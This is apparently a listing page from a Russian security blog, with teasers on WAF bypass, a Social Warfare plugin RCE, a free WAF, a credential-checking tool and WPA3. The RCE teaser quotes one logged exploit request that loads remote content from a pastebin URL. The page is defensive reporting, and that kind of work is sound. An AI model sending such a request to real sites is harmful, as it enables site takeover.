DefconRU | Сообщество специалистов в области информационной безопасности.

17.04.2019 @ 12:52 Методы обхода WAF

Информация предназначена исключительно для ознакомления. Не нарушайте законодательство.

Web Application Firewall — популярный инструмент для противодействия атакам на веб-приложения. В этой статье я продемонстрирую несколько способов обхода WAF.

Читать далее Методы обхода WAF →

03.04.2019 @ 13:30 Как мы обнаружили RCE, пытаясь воспроизвести XSS-уязвимость в Social Warfare

Pentestit, RCE, Social Warfare, XSS

Статья носит информационный характер. Не нарушайте законодательство.

Некоторое время назад WAF зафиксировал атаку, которая имела следующий вид:
https://defcon.ru/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https://pastebin.com/raw/0yJzqbYf

Из открытых источников мы узнали, что атака представляла собой попытку эксплуатации хранимой XSS уязвимости в Social Warfare — популярном WordpPress-плагине, установленном более чем на 70000 сайтов. Это показалось интересным и мы решили разобраться в уязвимости более детально.

Читать далее Как мы обнаружили RCE, пытаясь воспроизвести XSS-уязвимость в Social Warfare →

22.09.2018 @ 22:05 Nemesida WAF Free

Nemesida WAF, Pentestit, Web Application Firewall

Nemesida WAF Free — бесплатная версия «Nemesida WAF», обеспечивающая базовую защиту веб-приложения сигнатурным анализом, простая в установке и обслуживании, не имеющая высоких требований к аппаратным ресурсам.

Отличительной особенностью «Nemesida WAF Free» является простота установки и обслуживании, а также собственные сигнатуры, способные более точно выявлять атаки на веб-приложения при минимальном количестве ложных срабатываний.

Бесплатная версия «Nemesida WAF» представляет собой динамический модуль для ПО «nginx», обеспечивающий базовый функционал защиты веб-приложения от атак на основе сигнатурного метода. Подробнее

31.01.2018 @ 16:37 Cr3dOv3r — проверяем учётные данные на популярных сервисах

Cr3dOv3r, Cr3dOv3r v0.3, D4Vinchi, web-security

В данной статье будет рассмотрена утилита Cr3dOv3r, разработанная D4Vinchi и выложенная им на GitHub. При создании этого инструмента, D4Vinchi преследовал две основные идеи. Первая — это возможность проверить является ли ваша учетная запись скомпрометированной. Второй идеей данной утилиты является возможность проверить, подходят ли известные вам учетные данные к популярным сервисам.

Читать далее Cr3dOv3r — проверяем учётные данные на популярных сервисах →

11.01.2018 @ 13:42 Анонсирован новый стандарт защиты беспроводных сетей: WPA3

WPA3

Wi-Fi Alliance анонсировал сведения о внедрении протокола WPA3. По прогнозам первый официальный релиз будет доступен уже в этом году.
Читать далее Анонсирован новый стандарт защиты беспроводных сетей: WPA3 →